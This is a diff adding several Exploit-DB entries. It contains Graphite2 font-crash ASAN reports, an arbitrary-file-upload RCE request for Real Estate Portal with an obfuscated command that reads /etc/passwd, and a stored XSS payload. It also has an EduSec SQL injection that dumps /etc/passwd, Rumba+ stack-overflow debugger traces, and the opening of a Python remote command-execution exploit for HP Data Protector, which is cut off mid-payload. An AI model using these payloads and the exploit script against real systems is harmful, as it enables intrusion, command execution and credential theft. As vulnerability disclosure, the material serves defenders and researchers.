ca + Right alloca redzone: cb +==19167==ABORTING +--- cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254487. Attached are three font files which reproduce the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39862.zip + diff --git a/platforms/multiple/dos/39863.txt b/platforms/multiple/dos/39863.txt new file mode 100755 index 000000000..a675e0086 --- /dev/null +++ b/platforms/multiple/dos/39863.txt @@ -0,0 +1,138 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=756 + +We have encountered several different crashes in the graphite2::NameTable::getName method, observed in an ASAN build of the standard Graphite2 gr2FontTest utility (git trunk), triggered with the following command: + +$ ./gr2fonttest -demand -cache /path/to/file + +Below are three unique ASAN reports that we have triggered. + +--- cut --- +==1191==ERROR: AddressSanitizer: SEGV on unknown address 0x61b000026b15 (pc 0x000000553c81 bp 0x7ffc0e24a820 sp 0x7ffc0e24a800 T0) + #0 0x553c80 in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16 + #2 0x5516cb in unsigned short be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24 + #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +AddressSanitizer can not provide additional info. +SUMMARY: AddressSanitizer: SEGV graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +==1191==ABORTING +--- cut --- + +--- cut --- +==1199==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001fb95 at pc 0x000000553c7d bp 0x7ffdebef2a70 sp 0x7ffdebef2a68 +READ of size 1 at 0x61b00001fb95 thread T0 + #0 0x553c7c in unsigned long be::_peek<1>(unsigned char const*) graphite/src/./inc/Endian.h:77:73 + #1 0x553bd3 in unsigned long be::_peek<2>(unsigned char const*) graphite/src/./inc/Endian.h:50:16 + #2 0x5516cb in unsigned short be::read(unsigned char const*&) graphite/src/./inc/Endian.h:60:23 + #3 0x59192b in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:157:24 + #4 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #5 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #6 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #7 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +AddressSanitizer can not describe address in more detail (wild memory access suspected). +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/Endian.h:77:73 in unsigned long be::_peek<1>(unsigned char const*) +Shadow bytes around the buggy address: + 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c367fffbf70: fa fa[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbf90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbfa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbfb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c367fffbfc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==1199==ABORTING +--- cut --- + +--- cut --- +==1315==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000db3a at pc 0x00000057d59d bp 0x7ffd01d33840 sp 0x7ffd01d33838 +READ of size 2 at 0x60400000db3a thread T0 + #0 0x57d59c in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) graphite/src/./inc/UtfCodec.h:97:27 + #1 0x57d0a7 in graphite2::_utf_iterator::reference::operator unsigned int() const graphite/src/./inc/UtfCodec.h:173:74 + #2 0x591d32 in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:173:18 + #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +0x60400000db3a is located 0 bytes to the right of 42-byte region [0x60400000db10,0x60400000db3a) +allocated by thread T0 here: + #0 0x4b85b8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40 + #1 0x55a24a in unsigned short* graphite2::gralloc(unsigned long) graphite/src/./inc/Main.h:88:28 + #2 0x5916ef in graphite2::NameTable::getName(unsigned short&, unsigned short, gr_encform, unsigned int&) graphite/src/NameTable.cpp:147:37 + #3 0x572e5c in gr_fref_label graphite/src/gr_features.cpp:97:12 + #4 0x4eaec8 in Parameters::printFeatures(gr_face const*) const (graphite/gr2fonttest/gr2fonttest+0x4eaec8) + #5 0x4ed32b in Parameters::testFileFont() const (graphite/gr2fonttest/gr2fonttest+0x4ed32b) + #6 0x4f06c9 in main (graphite/gr2fonttest/gr2fonttest+0x4f06c9) + +SUMMARY: AddressSanitizer: heap-buffer-overflow graphite/src/./inc/UtfCodec.h:97:27 in graphite2::_utf_codec<16>::get(unsigned short const*, signed char&) +Shadow bytes around the buggy address: + 0x0c087fff9b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c087fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +=>0x0c087fff9b60: fa fa 00 00 00 00 00[02]fa fa fd fd fd fd fd fd + 0x0c087fff9b70: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd + 0x0c087fff9b80: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 00 + 0x0c087fff9b90: fa fa 00 00 00 00 00 fa fa fa fd fd fd fd fd fa + 0x0c087fff9ba0: fa fa fd fd fd fd fd fd fa fa fd fd fd fd fd fa + 0x0c087fff9bb0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fd +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==1315==ABORTING +--- cut --- + +The bug was reported at https://bugzilla.mozilla.org/show_bug.cgi?id=1254497. Attached are three font files which reproduce the crashes. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39863.zip + diff --git a/platforms/php/webapps/39855.txt b/platforms/php/webapps/39855.txt new file mode 100755 index 000000000..6befccaff --- /dev/null +++ b/platforms/php/webapps/39855.txt @@ -0,0 +1,86 @@ +Real Estate Portal v4.1 Remote Code Execution Vulnerability + + +Vendor: NetArt Media +Product web page: http://www.netartmedia.net +Affected version: 4.1 + +Summary: Real Estate Portal is a software written in PHP, +allowing you to launch powerful and professional looking +real estate portals with rich functionalities for the private +sellers, buyers and real estate agents to list properties +for sale or rent, search in the database, show featured +ads and many others. The private sellers can manage their +ads at any time through their personal administration space. + +Desc: Real Estate Portal suffers from an arbitrary file upload +vulnerability leading to an arbitrary PHP code execution. The +vulnerability is caused due to the improper verification of +uploaded files in '/upload.php' script thru the 'myfile' POST +parameter. This can be exploited to execute arbitrary PHP code +by uploading a malicious PHP script file with '.php' extension +that will be stored in the '/uploads' directory. + +Tested on: nginx/1.10.0 + PHP/5.2.17 + MySQL/5.1.66 + + +Vulnerability discovered by Bikramaditya Guha aka "PhoenixX" + @zeroscience + + +Advisory ID: ZSL-2016-5325 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5325.php + + +06.05.2016 + +--- + + +1. Arbitrary File Upload: +------------------------- + +Parameter: myfile (POST) +POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29 + +POST /upload.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Referer: http://localhost/USERS/index.php +Content-Length: 419 +Content-Type: multipart/form-data; boundary=---------------------------8914507815764 +Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214 +Connection: close + +-----------------------------8914507815764 +Content-Disposition: form-data; name="myfile"; filename="Test.php" +Content-Type: image/jpeg + + + +-----------------------------8914507815764 +Content-Disposition: form-data; name="" + +undefined +-----------------------------8914507815764 +Content-Disposition: form-data; name="" + +undefined +-----------------------------8914507815764-- + + + +2. Persistent Cross Site Scripting: +----------------------------------- + +http://localhost/USERS/index.php +Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST) +Payload: " onmousemove=alert(1) \ No newline at end of file diff --git a/platforms/php/webapps/39856.txt b/platforms/php/webapps/39856.txt new file mode 100755 index 000000000..c5e293112 --- /dev/null +++ b/platforms/php/webapps/39856.txt @@ -0,0 +1,78 @@ +EduSec 4.2.5 Multiple SQL Injection Vulnerabilities + + +Vendor: Rudra Softech +Product web page: http://www.rudrasoftech.com +Affected version: 4.2.5 + +Summary: EduSec has a suite of selective modules specifically +tailored to the requirements of education industry. EduSec is +engineered and designed considering wide range of management +functions within the university. With the use of EduSec, staff +can be more accountable as it helps to know the performance of +each department in just few seconds. Almost all departments within +education industry (e. g. admission, administration, time table, +examination, HR, finance etc) can be synchronized and accessed. +EduSec helps to assign the responsibilities to employee staff +and can reduce time wastage and can speed up the administrative +functions. Core functions like admissions, library management, +transport management, students’ attendance in short entire range +of university functions can be well performed by EduSec. + +Desc: EduSec suffers from multiple SQL Injection vulnerabilities. +Input passed via multiple 'id' GET parameters are not properly +sanitised before being returned to the user or used in SQL queries. +This can be exploited to manipulate SQL queries by injecting +arbitrary SQL code. + +Tested on: MySQL/5.5.35-0ubuntu0.12.04.2 + Apache/2.4.12 (Ubuntu) + + +Vulnerability discovered by Bikramaditya Guha aka "PhoenixX" + @zeroscience + + +Advisory ID: ZSL-2016-5326 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5326.php + + +10.05.2016 + +-- + + +Parameter: id (GET) +POC URL: +http://localhost/student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file%28%27/etc/passwd%27%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--#guardians +http://localhost/employee/emp-master/view?id=20%27 + + +Request: +GET /student/stu-master/view?id=2%20UniOn%20SeleCt%201,load_file(%27/etc/passwd%27),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=r18cpflgekesdn8cam8c8jmf86; _csrf=0f8795c6671d0db724d513142cc81e5d3ca8b83c094b970242fda96899be8148a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22E-TdUjNTZVVugL36t2p-VcoC6MBR4hqq%22%3B%7D; language=32d49278f28c78229de164fe79dc13b6adb3c98af2d133240eb1ffc44771ad3da%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22language%22%3Bi%3A1%3Bs%3A2%3A%22en%22%3B%7D; isRTL=0fc3d58c320669b52dea022e5a3db09649641bfdd1cbba93929ce2932c57707aa%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22isRTL%22%3Bi%3A1%3Bi%3A0%3B%7D +Connection: close + +Response: +HTTP/1.1 200 OK +Date: Fri, 13 May 2016 08:35:05 GMT +Server: Apache/2.4.12 (Ubuntu) +<....snip> + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +. +.. +... +.... +..... +...... \ No newline at end of file diff --git a/platforms/windows/dos/39857.txt b/platforms/windows/dos/39857.txt new file mode 100755 index 000000000..2a6fb461c --- /dev/null +++ b/platforms/windows/dos/39857.txt @@ -0,0 +1,417 @@ + +Micro Focus Rumba+ v9.4 Multiple Stack Buffer Overflow Vulnerabilities + + +Vendor: Micro Focus +Product web page: https://www.microfocus.com +Affected version: 9.4.4058.0 and 9.4.0 SP0 Patch0 + +Affected products/tools : Rumba Desktop 9.4 + Rumba 9.4 Trace + Rumba 9.4 APPC Configuration + Rumba 9.4 AS400 Communications + Rumba 9.4 AS400 File Transfer + Rumba 9.4 Communication Monitor + Rumba 9.4 Engine + Rumba 9.4 Screen Designer + Rumba 9.4 Submit Remote Command ;] + Rumba FTP Client 4.5 + +Summary: Rumba is a terminal emulation solution with UI (User Interface) +modernization properties. Rumba and Rumba+ allows users to connect to +so-called 'legacy systems' (typically a mainframe) via desktop, web and +mobile. + +Desc: Rumba+ software package suffers from multiple stack buffer overflow +vulnerabilities when parsing large amount of bytes to several functions in +several OLE controls. An attacker can gain access to the system of the affected +node and execute arbitrary code. + +Tested on: Microsoft Windows 7 Ultimate SP1 (EN) + Microsoft Windows 7 Professional SP1 (EN) + Microsoft Windows 7 Enterprise SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5327 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5327.php + + +03.02.2016 + +-- + + +---------------------------- +1. MacroName (WdMacCtl.ocx): +---------------------------- + + + + + + +=== + +(1d78.52c): Access violation - code c0000005 (!!! second chance !!!) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\ntdll.dll - +eax=00000000 ebx=45454545 ecx=74d72a9c edx=42424242 esi=0032ddc0 edi=00000000 +eip=770a15fe esp=0032dd58 ebp=0032ddac iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +ntdll!NtRaiseException+0x12: +770a15fe 83c404 add esp,4 +0:000> !exchain +0032e7cc: 45454545 +Invalid exception stack at 44444444 +0:000> d 0032e7cc +0032e7cc 44 44 44 44 45 45 45 45-43 43 43 43 43 43 43 43 DDDDEEEECCCCCCCC +0032e7dc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e7ec 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e7fc 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e80c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e81c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e82c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0032e83c 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC +0:000> kb +ChildEBP RetAddr Args to Child +WARNING: Stack unwind information not available. Following frames may be wrong. +0032ddac 77147415 0032ddc0 0032de10 00000000 ntdll!NtRaiseException+0x12 +0032e0e0 7711071a 45454545 fffffffe fffffffe ntdll!RtlRemoteCall+0x236 +0032e130 770db3f5 45454545 0000004d 0032e82c ntdll!RtlUlonglongByteSwap+0x1327a +0032e1b0 77090133 0032e1c8 0032e218 0032e1c8 ntdll!LdrRemoveLoadAsDataTable+0xcac +0032e7b0 41414141 42424242 43434343 43434343 ntdll!KiUserExceptionDispatcher+0xf +0032e7b4 42424242 43434343 43434343 43434343 0x41414141 +0032e7b8 43434343 43434343 43434343 43434343 0x42424242 +0032e7bc 43434343 43434343 43434343 44444444 0x43434343 +0032e7c0 43434343 43434343 44444444 45454545 0x43434343 +0032e7c4 43434343 44444444 45454545 43434343 0x43434343 +0032e7c8 44444444 45454545 43434343 43434343 0x43434343 +0032e7cc 45454545 43434343 43434343 43434343 0x44444444 +0032e7d0 43434343 43434343 43434343 43434343 0x45454545 +0032e7d4 43434343 43434343 43434343 43434343 0x43434343 +0032e7d8 43434343 43434343 43434343 43434343 0x43434343 +0032e7dc 43434343 43434343 43434343 43434343 0x43434343 + + +----------------------------- +2. NetworkName (iconfig.dll): +----------------------------- + + + + + + +=== + +STATUS_STACK_BUFFER_OVERRUN encountered +(2958.3e0): Break instruction exception - code 80000003 (first chance) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\syswow64\kernel32.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\windows\SysWOW64\MSVCR120.dll - +eax=00000000 ebx=616c4480 ecx=76280484 edx=003ee021 esi=00000000 edi=003ee794 +eip=76280265 esp=003ee268 ebp=003ee2e4 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +kernel32!GetProfileStringW+0x12cc9: +76280265 cc int 3 +.. +0:000> d esp+400 +003ee668 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee678 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee688 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee698 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6a8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6b8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6c8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +003ee6d8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB +0:000> u +kernel32!GetProfileStringW+0x12cc9: +76280265 cc int 3 +76280266 c745fcfeffffff mov dword ptr [ebp-4],0FFFFFFFEh +7628026d e9c574feff jmp kernel32!UnhandledExceptionFilter+0x40 (76267737) +76280272 33c0 xor eax,eax +76280274 40 inc eax +76280275 c3 ret +76280276 8b65e8 mov esp,dword ptr [ebp-18h] +76280279 68090400c0 push 0C0000409h +0:000> dds +003ee6e8 42424242 +003ee6ec 42424242 +003ee6f0 42424242 +003ee6f4 42424242 +003ee6f8 42424242 +003ee6fc 42424242 +003ee700 42424242 +003ee704 42424242 +003ee708 42424242 +003ee70c 42424242 +003ee710 42424242 +003ee714 42424242 +003ee718 42424242 +003ee71c 42424242 +003ee720 42424242 +003ee724 42424242 +003ee728 42424242 +003ee72c 42424242 +003ee730 42424242 +003ee734 42424242 +003ee738 42424242 +003ee73c 42424242 +003ee740 1e4cd74b +003ee744 003ec760 +003ee748 7594d140 OLEAUT32!DispCallFunc+0xa6 +003ee74c 006a191c +003ee750 02f50024 +003ee754 006a1a7c +003ee758 001df530 +003ee75c 003ee754 +003ee760 003ee7f0 +003ee764 7594cfba OLEAUT32!VarCmp+0xd35 + + +------------------------ +3. CPName (iconfig.dll): +------------------------ + + + + + + + +------------------------------ +4. PrinterName (ProfEdit.dll): +------------------------------ + + + + + + +=== + +(23f4.4c2c): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll - +eax=baadf00d ebx=5fab4b10 ecx=baadf00d edx=003857b8 esi=0030e7b8 edi=0030e66c +eip=5fa63a60 esp=0030e5fc ebp=0030e604 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +ProfEdit+0x13a60: +5fa63a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=?? + + +---------------------- +5. Data (FtxBIFF.dll): +---------------------- + + + + + + +=== + +(1164.1dd4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\AS400\FtxBIFF.dll - +eax=00000000 ebx=56c0a928 ecx=757bd0c4 edx=fffff000 esi=baadf00d edi=0036eba8 +eip=56bf3011 esp=0033ddc8 ebp=0033ddd4 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 +FtxBIFF+0x3011: +56bf3011 837e2020 cmp dword ptr [esi+20h],20h ds:002b:baadf02d=???????? +0:000> d esp +0033ddc8 f0 dd 33 00 0d f0 ad ba-0d f0 ad ba 48 eb 36 00 ..3.........H.6. +0033ddd8 2c 83 bf 56 02 00 00 00-03 00 00 00 00 00 00 00 ,..V............ +0033dde8 f0 dd 33 00 40 eb 36 00-41 41 41 41 41 41 41 41 ..3.@.6.AAAAAAAA +0033ddf8 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de08 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de18 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de28 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA +0033de38 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA + + +----------------------------------- +6. Serialized (NMSecComParams.dll): +----------------------------------- + + + + + + +=== + +(1508.1a9c): Stack overflow - code c00000fd (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll - +eax=00362000 ebx=1003efa0 ecx=001d369c edx=0045e600 esi=0045e8b0 edi=0045e6d4 +eip=100366b7 esp=0045e640 ebp=0045e684 iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +NMSecComParams!DllUnregisterServer+0x4617: +100366b7 8500 test dword ptr [eax],eax ds:002b:00362000=00000000 + + +--------------------------------- +7. UserName (NMSecComParams.dll): +--------------------------------- + + + + + + +=== + +(1620.16bc): Stack overflow - code c00000fd (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RSS\NMSecComParams.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\OLEAUT32.dll - +eax=000d2000 ebx=1003edd0 ecx=00000000 edx=003e390a esi=001ceba8 edi=001cea5c +eip=100366b7 esp=001ce9e4 ebp=001cea0c iopl=0 nv up ei pl nz na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 +NMSecComParams!DllUnregisterServer+0x4617: +100366b7 8500 test dword ptr [eax],eax ds:002b:000d2000=00000000 + + +------------------------- +8. LUName (ProfEdit.dll): +------------------------- + + + + + + +=== + +(f10.1cb8): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\Micro Focus\RUMBA\System\profedit\ProfEdit.Dll - +eax=baadf00d ebx=55944ba4 ecx=baadf00d edx=005c32b0 esi=0022e738 edi=0022e5ec +eip=558f3a60 esp=0022e578 ebp=0022e580 iopl=0 nv up ei pl nz ac pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216 +ProfEdit+0x13a60: +558f3a60 c6808401000000 mov byte ptr [eax+184h],0 ds:002b:baadf191=?? + + +------------------------- +9. newVal (FTPSFtp.dll): +------------------------- + + + + + + +=== + +STATUS_STACK_BUFFER_OVERRUN encountered +(608.f74): Break instruction exception - code 80000003 (first chance) +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\syswow64\kernel32.dll - +*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SysWOW64\MSVCR120.dll - +eax=00000000 ebx=10027e44 ecx=757d047c edx=0039dc45 esi=00000000 edi=0039e594 +eip=757d025d esp=0039de8c ebp=0039df08 iopl=0 nv up ei pl zr na pe nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 +kernel32!GetProfileStringW+0x12cc1: +757d025d cc int 3 + + +---------------------- +10. Host (FTP Client): +---------------------- + +For the RUMBA FTP Client PoC, copy ~300 bytes array and paste it in the Host field when creating a new session. + diff --git a/platforms/windows/remote/39858.py b/platforms/windows/remote/39858.py new file mode 100755 index 000000000..47ca6cdaf --- /dev/null +++ b/platforms/windows/remote/39858.py @@ -0,0 +1,154 @@ +#!/usr/bin/python +# +# Exploit Title: Data Protector Encrypted Communications +# Date: 26-05-2016 +# Exploit Author: Ian Lovering +# Vendor Homepage: http://www8.hp.com/uk/en/software-solutions/data-protector-backup-recovery-software/ +# Version: A.09.00 and earlier +# Tested on: Windows Server 2008 +# CVE : CVE-2016-2004 +# + +# This proof of concept demonstrates that enabling encrypted control communication on +# Data Protector agents does not provide any additional security. +# As is provides no authentication it is not a viable workaround to prevent the +# exploitation of well known Data Protector issues such as cve-2014-2623 +# +# This exploit establishes and unauthenticated encrypted communication channel to +# a Data Protector Agent and uses a well known unencrypted Data Protector vulnerability +# to run arbitrary commands on the target. + +# Tested on Kali Linux 2 with python 2.7.9 +# Tested against Data Protector A.09.00 (Internal Build version 88) with encrypted control +# communication enabled. +# All other Data Protector settings are default. +# Tested against Data Protector agent running on Windows 2008 R2 +# Also tested against Data Protector A.07 +# +# encrypted-dataprotector.py -e +# +# By default runs ipconfig on the target. +# Can take a little while to return. Have patience ;) +# +# CVE-2016-2004 + +import socket +import ssl +import time +import struct +import argparse + + +parser = argparse.ArgumentParser(prog='test-encrypt.py') +parser.add_argument('-e', '--encrypt', dest='encrypt', action='store_true') +parser.add_argument('-p', '--port', type=int) +parser.add_argument('-c', '--command') +parser.add_argument('ipaddress') +parser.set_defaults(encrypt=False,port=5555) +args = parser.parse_args() + +HOST = args.ipaddress +PORT = args.port + +command = 'ipconfig' + +if args.command: + command = args.command + +# initialise data +initdata = ("\x00\x00\x00\x48\xff\xfe\x32\x00\x36\x00\x37\x00\x00\x00\x20\x00" + "\x31\x00\x30\x00\x00\x00\x20\x00\x31\x00\x30\x00\x30\x00\x00\x00" + "\x20\x00\x39\x00\x30\x00\x30\x00\x00\x00\x20\x00\x38\x00\x38\x00" + "\x00\x00\x20\x00\x6f\x00\x6d\x00\x6e\x00\x69\x00\x64\x00\x6c\x00" + "\x63\x00\x00\x00\x20\x00\x34\x00\x00\x00\x00\x00") + +OFFSET = 46 +command = command.replace("\\", "\\\\") +command = command.replace("\'", "\\\'") +command_length = struct.pack(">I",OFFSET + len(command)) +payload = command_length +\ + "\x32\x00\x01\x01\x01\x01\x01\x01" +\ + "\x00\x01\x00\x01\x00\x01\x00\x01" +\ + "\x01\x00\x20\x32\x38\x00\x5c\x70" +\ + 